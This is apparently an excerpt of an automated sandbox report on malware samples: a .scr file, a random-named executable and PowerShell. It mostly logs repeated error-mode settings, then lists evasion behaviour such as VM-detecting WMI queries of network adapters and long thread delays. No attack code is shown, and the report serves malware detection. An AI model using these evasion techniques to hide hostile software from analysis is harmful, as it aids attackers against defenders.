                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: 1D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: 3F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: 8030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: 5FF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: 9030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: A030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: A4F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: 8030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 340000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 22C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 590000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 60C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 51E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 70C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 80C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 8680000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 60C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: 1C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: 25B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: 700000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 1C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 2240000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 1F20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
